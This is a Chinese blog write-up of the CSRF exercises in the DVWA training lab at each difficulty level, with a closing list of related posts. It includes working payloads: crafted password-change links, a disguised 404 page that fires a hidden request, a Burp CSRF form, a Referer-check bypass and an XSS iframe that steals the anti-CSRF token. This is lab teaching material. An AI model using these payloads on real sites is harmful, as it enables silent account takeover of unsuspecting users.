结合DVWA-CSRF浅析

已于 2023-04-11 21:15:23 修改
阅读量657 收藏 2
点赞数
分类专栏: 靶场 文章标签: 安全 csrf web安全
于 2022-03-12 20:01:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43660551/article/details/122417424
版权

CSRF:跨站请求伪造。即利用受害者未过期的身份认证信息(cookie、session等),诱导其点击攻击者构造的恶意链接,或者恶意页面,在受害人不知情的情况下,利用(不像XSS那样盗取)受害人有效的身份认证信息,向受害人访问的服务器发送请求,从而完成非法操作,如:改密码、转账等。

一.攻击方法:

1.直接构造恶意链接。(看上去就像是改密码的,反正我不点)

http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#c        此处127.0.0.1,是因为我是本地搭建的测试环境,买不起服务器...... 如果买了服务器,这里就是服务器地址。

2.使用短连接隐藏URL

        百度一个短连接生成工具,将长链接转换成短连接 http://mrw.so/60ASv6 ,这样看上去不像上面那个链接那么明显了。但只改链接的话,还是会出现密码修改成功的界面,仍会被受害人发现,所以不是很理想的方法。

3.设计攻击界面

        受害人不知道自己访问的是修改密码的界面,看到的是一个攻击者设计的界面,比如404页面,这样就悄悄地修改了受害人的密码。有自己服务器的话,在服务器上上传设计好的攻击界面;这里由于我没有服务器,故在本地写一个html文件做攻击界面。

<html>
<head>
</head>
<body>
<img src="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change#c">
<h1>404<h1>
<h2>file not found.<h2>
</body>
</html>

4.结合存储型XSS进行攻击

将CSRF代码写入XSS注入点。

二.DVWA靶场-CSRF:

1.low:

        将密码改成123并确认,提交。提示密码修改成功。 此时网址栏内容为:http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#

看下源码。

        这里只是对比pass_new和pass_conf是否相同,无任何过滤。故将上面链接中pass_new和pass_conf改为你想改成的密码,保证pass_new和pass_conf一样就行。http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change#

2.medium:

上面的方法在此已经行不通了。看下源码。

        这里stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ])判断referer中是否包含主机名(通过了解来源来防止CSRF),故可使referer包含主机名绕过,由于我只是测试。我作为攻击方ip是127.0.0.1(买不起服务器,用的本地调试ip),被攻击者的主机名是他的ip(假定为:192.168.125.25),故将攻击界面命名为192.168.125.25.html  放于攻击者的服务器里面,其内容如下:

<html>
<head>
</head>
<body>
<img src="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change#c">
<h1>404<h1>
<h2>file not found.<h2>
</body>
</html>

        或使用burp suite生成的那个html页面,如下:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DVWA/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="111" />
      <input type="hidden" name="password&#95;conf" value="111" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

        在同一个浏览器访问这个文件。链接为 http://127.0.0.1/192.168.125.25.html ,访问后出现“404 file not found”,密码成功修改,且受害人看不到修改密码的界面。受害人会以为自己点了一个失效的链接。

        验证下密码是否修改成功:我们修改后的密码是111,用账号admin和密码111登录。可见登陆成功。故CSRF攻击成功。

 3.high:

        看下核心源码:这里加入了Anti-CSRF token机制。用户每次访问修改密码页面时,服务器返回一个随机token,当用户向服务器发起请求时,需要提交token,在服务器收到请求时,会先检查token,只有token正确时,服务器才会处理客户端的请求。

         故关键在于获得user_token。这里需要利用受害者的cookie去修改密码的页面获取关键的user_token。

方法1:

        构造攻击界面放在攻击者的服务器上,引诱受害人访问。但是要访问的服务器和攻击者的服务器域名不同,跨域了。(域B下所有页面不允许主动获取域A下的页面内容,除非域A主动给域B的页面发信息。)现在的浏览器不允许跨域,故方法一不太现实。

方法2:

        将攻击代码注入到目标服务器。结合高级XSS漏洞,获取token。

        这里XSS注入长度有限制,不能注入完整的攻击脚本,所以只能获取token。到XSS处,f12,修改name的长度,输入要注入的代码:<iframe src="../csrf/"οnlοad=alert(frames[0].document.getElementsByName('user_token')[0].value)>  ,获得token值为6137a0e053b0509cc3a8565538632ba2。如果点击“确定”,token会刷新,故暂时不要点它。

        不构造页面,直接构造链接:http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=222&password_conf=222&Change=Change&user_token=6137a0e053b0509cc3a8565538632ba2

        不过,这样受害人会发现修改成功的界面,故可以构造攻击界面。在弹出user_token后,构造链接:http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=222&password_conf=222&Change=Change&user_token=6137a0e053b0509cc3a8565538632ba2 替换1.html中的链接,并保存文件。1.html如下:

<a href="2.html"><img src="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=222&password_conf=222&Change=Change&user_token=6137a0e053b0509cc3a8565538632ba2">点击重试</a>

用浏览器打开1.html,如下图:

        点击下“点击重试”,出现构造的另一个掩盖密码修改成功的页面2.html如下:

 <h1>哈哈哈 404了(密码已修改)</h1>

4、impossible:

看下核心代码:这里使用PDO技术,防止SQL注入。对于CSRF,要求输入password_current,即旧密码,攻击者不知道旧密码,故无法进行CRSF攻击。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_curr = $_GET[ 'password_current' ];
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Sanitise current password input
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass_curr = md5( $pass_curr );

	// Check that the current password is correct
	$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
	$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
	$data->execute();

	// Do both new passwords match and does the current password match the user?
	if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
		// It does!
		$pass_new = stripslashes( $pass_new );
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update database with new password
		$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
		$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->execute();

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match or current password incorrect.</pre>";
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

发奋的鼹鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA之CSRF漏洞(详细)
qq_44720671的博客
07-26 1万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA通关攻略之跨站请求伪造
勿山几已
05-12 516
介绍CSRF攻击并简单演示攻击过程。
DVWA跨站请求伪造CSRF攻击全面分析
abraham76的博客
10-01 3315
1、CSRF简介    CSRF全称是Cross Site Request Forgery,跨站请求伪造。简单理解就是利用客户身份伪造请求,以达到指定目的。    具体场景就是:假设A登陆了某游戏网站Game,那么Game网站就会返回一个cookie来记录用户身份,以后每次请求都会自动携带该cookie与Game服务器交互。然后攻击者B精心构造了一个链接或者网页,诱使用户点击,这时就会向Game服务器发送一个请求,而该请求是携带了cookie值的,服务器就会处理该请求。B的目的就达到了。    CSRF攻击
DVWA学习记录系列(四)SCRF 跨站伪造请求模块
qq_43696276的博客
10-17 674
提示:本文主要针对于SCRF 跨站伪造请求全等级的分析以及相应的破解。 文章目录前言一、CSRF是什么?二、使用步骤1.引入库2.读入数据总结 前言 本次主要针对于DVWA当中的跨站伪造请求模块进行学习。主要进行的是dvwa的low、medium、high级别进行破解,由于impossible模块难度过高所以都将不进行impossible的实验。本次CSRF的high级别将会放至之后的存储xss漏洞中进行讲解。 一、CSRF是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数
DVWA-CSRF全通关(图文详解+源码解析)
热门推荐
weixin_46709219的博客
03-13 1万+
一)名词解释: CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在2013年发布的新版OWASP Top 10中,CSRF排名第8。 二)原理: 三)DVWA——
[网络安全] DVWA之CSRF攻击姿势及解题详析合集
等风来
06-16 2458
以上为[网络安全] DVWA之CSRF攻击姿势及解题详析合集,考察CSRFBurp使用及PHP代码审计等相关知识。我是秋说,我们下次见。
【DVWA】CSRF详解
qq_43665434的博客
03-03 1242
【DVWA】CSRF 一、low级别 1、测试流程 如图,输入一次新密码和一次确认新密码就可更改密码,并没有索要旧密码进行验证。 用burp抓包看一下: 发现是get请求,而且并没有token,所以明显存在CSRF漏洞。 伪造一个请求链接: http://222.24.28.118/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 将password_new和passw
通过DVWA教你学会CSRF攻击
Monsterlz123的博客
07-18 2201
【CSRF】通过DVWA教你学会CSRF攻击 Hello 各位小伙伴大家好~ 这里是熬夜在写公众号的小编… 话说小编身边又有小伙伴脱单了,今天依然是为别人爱情流泪的一天… 唉,无心写公众号(自暴自弃中~) 今天就一起来看看,什么是CSRF攻击吧… Part 1:什么是CSRF攻击? CSRF(Cross-Site Request Forgery)跨站点请求伪造。 是指利用受害者未失效的身份...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA—CSRF 跨站请求伪造
qq_39330735的博客
02-08 229
CSRF攻击。 基于DVWA靶场来实现跨站请求伪造~
DVWA-CSRF详解
nex1less的博客
07-22 923
0x01 级别low 1.源码 CSRF Source <?php if (isset($_GET['Change'])) { // Turn requests into variables $pass_new = $_GET['password_new']; $pass...
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2778
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
DVWA靶场通关——CSRF攻击
p36273的博客
07-01 1320
DVWA靶场一共又三关,现在我们就来通关吧。使用工具:Burp Suite Professional抓包工具。
DVWA学SQL注入&CSRF
梦想专栏
08-22 709
简介 在本文中,您将学习跨站点请求伪造攻击。对于CSRF教程,我并尝试针对DVWA绕过低安全级别。 跨站点请求伪造,也称为one-click attack 或 session riding,缩写为CSRF(有时被称为sea-surf)或XSRF,是一种恶意利用网站session 的攻击方式,通过用户发送未授权的命令,利用网站信任完成。与跨站点脚本(XSS)不同,后者利用用户对特定站点的信任,C...
DVWA中CSRF高级
m0_73896875的博客
07-11 278
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码中可以看到生成的Token。在high级别中,屏蔽了标签,所以无法直接利用。
【小猪学渗透】打靶第3天:DVWA入门:XSS漏洞、文件包含、CSRF
最新发布
weixin_43521720的博客
03-20 839
随便输入点东西,发现了,可以输出。输入爆出xss漏洞爆出cookie。攻略上说查看源代码发现<script>标签被限制了,被替换了。(话说我没怎么学php语言这个源代码有点看不大懂,一会去补补)依旧爆出漏洞,说明成功了也可以通过大小写绕过这一部分的php代码算是看明白了,就是一个过滤的意思呗~那么我们使用别的标签也可以达到我们的目的。这个payload不成功,不知道哪里出的什么问题。
DVWA—CSRF(跨站请求伪造)
Cwillchris的博客
10-28 615
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、源码分析 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input //获取两个输入框的密码 $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf'.
DVWA之CSRF漏洞复现
weixin_43263451的博客
07-19 1036
CSRF(跨站请求伪造)定义跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 基本原理 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:   ...
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值